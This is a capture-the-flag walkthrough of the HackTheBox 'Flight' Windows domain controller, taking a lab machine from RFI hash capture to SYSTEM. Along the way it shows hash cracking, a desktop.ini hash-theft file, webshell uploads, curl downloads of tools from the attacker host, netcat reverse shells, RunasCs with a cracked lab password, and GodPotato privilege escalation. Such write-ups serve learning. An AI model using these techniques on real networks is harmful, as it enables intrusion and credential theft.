Flight is a Hard Windows Machine from HTB created by Geiseric which starts off with an RFI vulnerability to capture an NTLMv2 hash. This hash can be cracked and password sprayed to get a hit on different Domain User. This user has write acess to a share so I’ll use ntlm_theft to generate an .ini file which lets me capture another NTLMv2 hash for another user. I can crack this hash to get creds for a user that can write to the share that controls the website. So I’ll drop a webshell on the site to get a shell as svc_apache. I’ll then use RunasCs.exe to get a shell as C.Bum, a previously owned user. With that shell I have write access over an internal website running IIS, so I drop an .aspx webshell on there to get a shell as defaultapppool. This account has SeImpersonatePrivilege, which allows me to gain SYSTEM level access via GodPotato.exe.
獣 ~/htb/Flight/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.11.187 -oA flight # Nmap 7.94SVN scan initiated Wed Oct 30 22:23:07 2024 as: /usr/lib/nmap/nmap -sCV --top-ports 10000 -T4 -vvvv -oA flight 10.10.11.187 Nmap scan report for 10.10.11.187 Host is up, received echo-reply ttl 127 (0.091s latency). Scanned at 2024-10-30 22:23:07 EDT for 77s Not shown: 8355 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-title: g0 Aviation | http-methods: | Supported Methods: OPTIONS HEAD GET POST TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-31 09:23:33Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Oct 30 22:24:24 2024 -- 1 IP address (1 host up) scanned in 77.29 seconds
I can see all the default ports that would be open on a DC. But I also see 80/tcp which is HTTP, I’ll start by checking there for a foothold.
Recon
80 - HTTP
Going to the site, I am presented with a site for planning flights:
I can see a domain name in the bottom left of the page:
1
Copyright 2022 flight.htb - All Rights Reserved
I’ll add this to my /etc/hosts file and I’ll look for subdomains:
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000624: 200 90 L 412 W 3996 Ch "school"
I get one result, school.flight.htb. I’ll add this to my /etc/hosts file:
1
10.10.11.187 school.flight.htb flight.htb
I’ll now visit http://school.flight.htb:
Going to any of the pages such as About Us puts a param in the URL:
The LFI doesn’t really do anything for me since I can’t read any sensitive files. One common thing I’d try here is using a UNC path to pull resources from a remote host. I’d usually use a payload like this:
1
\\<tun0>\share
But back slashes are blocked by the filter, so using forward slashes once again can bypass the filter:
獣 ~/htb/Flight/enumeration ➜ hashcat -a 0 svc_apache.hash /usr/share/wordlists/rockyou.txt --show Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed! Do NOT report auto-detect issues unless you are certain of the hash type.
From the nxc output, I can see that I can write to a share named Shared:
1 2 3 4 5 6 7 8
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/S.Moon@G0.flight.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Type help for list of commands # use Shared # put test.txt [-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
I don’t have access for putting test.txt, this is probably because of the file type. After some enum I find that .ini files can be uploaded:
Password: Type help for list of commands # use Shared # put test.ini # ls drw-rw-rw- 0 Thu Oct 31 06:10:56 2024 . drw-rw-rw- 0 Thu Oct 31 06:10:56 2024 .. -rw-rw-rw- 6 Thu Oct 31 06:10:56 2024 test.ini
Since .ini files can steal NTLMv2 hashes, I’ll use ntlm_theft to try to capture another NTLMv2 hash using a fake desktop.ini that pulls a resource from my SMB server:
I’ll crack this hash with hashcat just like last time:
1 2 3 4 5 6 7 8 9 10
獣 ~/Documents/hexo ➜ hashcat -a 0 cbum.hash /usr/share/wordlists/rockyou.txt --show Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed! Do NOT report auto-detect issues unless you are certain of the hash type.
I can write to a Web share, I’ll check out whats in there:
1 2 3 4 5 6 7 8 9 10 11
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/C.Bum@G0.flight.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Type help for list of commands # use Web # ls drw-rw-rw- 0 Thu Oct 31 06:18:27 2024 . drw-rw-rw- 0 Thu Oct 31 06:18:27 2024 .. drw-rw-rw- 0 Thu Oct 31 06:17:00 2024 flight.htb drw-rw-rw- 0 Thu Oct 31 06:17:00 2024 school.flight.htb
Seems like the root directory for both websites, I’ll try dropping a test.txt file to see if I can access it on the website:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
獣 ~/htb/Flight/enumeration ➜ impacket-smbclient flight.htb/C.Bum@G0.flight.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Type help for list of commands # use Web # cd school.flight.htb # put test.txt # ls drw-rw-rw- 0 Thu Oct 31 06:19:08 2024 . drw-rw-rw- 0 Thu Oct 31 06:19:08 2024 .. -rw-rw-rw- 1689 Mon Oct 24 23:54:45 2022 about.html -rw-rw-rw- 3618 Mon Oct 24 23:53:59 2022 blog.html -rw-rw-rw- 2683 Mon Oct 24 23:56:58 2022 home.html drw-rw-rw- 0 Thu Oct 31 06:17:00 2024 images -rw-rw-rw- 2092 Thu Oct 27 03:59:25 2022 index.php -rw-rw-rw- 179 Thu Oct 27 03:55:16 2022 lfi.html drw-rw-rw- 0 Thu Oct 31 06:17:00 2024 styles -rw-rw-rw- 6 Thu Oct 31 06:20:04 2024 test.txt
I’ll check if that file is there on the website:
The file was written succesfully, and seeing as the site is running PHP, I’ll drop p0wny onto the website which is a PHP webshell:
# put p0wny.php # ls drw-rw-rw- 0 Thu Oct 31 06:23:47 2024 . drw-rw-rw- 0 Thu Oct 31 06:23:47 2024 .. -rw-rw-rw- 1689 Mon Oct 24 23:54:45 2022 about.html -rw-rw-rw- 3618 Mon Oct 24 23:53:59 2022 blog.html -rw-rw-rw- 2683 Mon Oct 24 23:56:58 2022 home.html drw-rw-rw- 0 Thu Oct 31 06:22:00 2024 images -rw-rw-rw- 2092 Thu Oct 27 03:59:25 2022 index.php -rw-rw-rw- 179 Thu Oct 27 03:55:16 2022 lfi.html -rw-rw-rw- 20321 Thu Oct 31 06:23:47 2024 p0wny.php drw-rw-rw- 0 Thu Oct 31 06:22:00 2024 styles
I’ll try to visit the webshell on the site to check if it was put there successfully:
Geting a Rev Shell
I’ll get a reverse shell using nc64.exe, first I’ll download it:
1 2 3 4 5 6 7 8
svc_apache@g0:C:\xampp\htdocs\school.flight.htb# cd \programdata svc_apache@g0:C:\ProgramData# curl http://10.10.14.10/nc64.exe -o nc64.exe % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed
獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 49942 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
User Name SID ================= ============================================== flight\svc_apache S-1-5-21-4078382237-1492182817-2568127209-1612
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
No interesting privs or groups, I’ll check C:\:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
PS C:\> ls ls
Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/31/2024 3:32 AM inetpub d----- 6/7/2022 6:39 AM PerfLogs d-r--- 10/21/2022 11:49 AM Program Files d----- 7/20/2021 12:23 PM Program Files (x86) d----- 10/31/2024 3:18 AM Shared d----- 9/22/2022 12:28 PM StorageReports d-r--- 9/22/2022 1:16 PM Users d----- 10/21/2022 11:52 AM Windows d----- 9/22/2022 1:16 PM xampp
I can see C:\xampp which is expected because of the two sites I saw earlier. But C:\inetpub is present, which means IIS is installed so I’ll check that out:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
PS C:\> cd inetpub cd inetpub PS C:\inetpub> ls ls
Directory: C:\inetpub
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/22/2022 12:24 PM custerr d----- 10/31/2024 3:32 AM development d----- 9/22/2022 1:08 PM history d----- 9/22/2022 12:32 PM logs d----- 9/22/2022 12:24 PM temp d----- 9/22/2022 12:28 PM wwwroot
I see wwwroot is default, but development isn’t, so I’ll look at that:
Seems like another site? I’ll use icacls to see the directory permissions:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
PS C:\inetpub\development> cd .. cd .. PS C:\inetpub> icacls development icacls development development flight\C.Bum:(OI)(CI)(W) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Very interesting, C.Bum (a previously pwned user) has write privs over this directory. Since I have his credentials I can get a shell as C.Bum via RunasCs.exe:
1 2 3 4 5
PS C:\programdata> curl http://10.10.14.10/RunasCs.exe -o RunasCs.exe curl http://10.10.14.10/RunasCs.exe -o RunasCs.exe PS C:\programdata> .\RunasCs.exe .\RunasCs.exe [-] Not enough arguments. 3 Arguments required. Use --help for additional help.
I’ll use C.Bum‘s creds to get powershell.exe:
1 2 3 4 5 6 7
PS C:\programdata> .\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.10:443 powershell.exe .\RunasCs.exe C.Bum Tikkycoll_431012284 -r 10.10.14.10:443 powershell.exe [*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-64120$\Default [+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4304 created in background.
This works and I get a shell as C.Bum:
1 2 3 4 5 6 7 8 9
獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 49999 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Its probably 8000 since I know the other two sites are on 80. Now I need to access the port so I’ll just use chisel.exe. First I’ll start chisel server:
Now going to 127.0.0.1:8000 on my browser shows me the site:
And I can go to /shell.aspx for a webshell:
Keep in mind that there is a cleanup script so your shell might get deleted. I’ll get an actual revshell through using nc64.exe again:
1 2 3 4 5 6 7 8 9
獣 ~/htb/Flight/enumeration ➜ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.187] 50067 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
User Name SID ========================== ============================================================= iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeMachineAccountPrivilege Add workstations to domain Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Shell as SYSTEM
As I guessed, I do have SeImpersonatePrivilege, I’ll abuse this to get a shell as SYSTEM using GodPotato.exe:
I got a shell as SYSTEM! With that I can read the root flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
PS C:\programdata> cd \users\administrator\desktop cd \users\administrator\desktop PS C:\users\administrator\desktop> ls ls
Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 10/31/2024 2:14 AM 34 root.txt
Flight was a LOT of enum, but it was very fun and an interesting machine. I really liked all of the aspects of pivoting to different users. And I liked how the author showcased RunasCs.exe since I feel like its important.
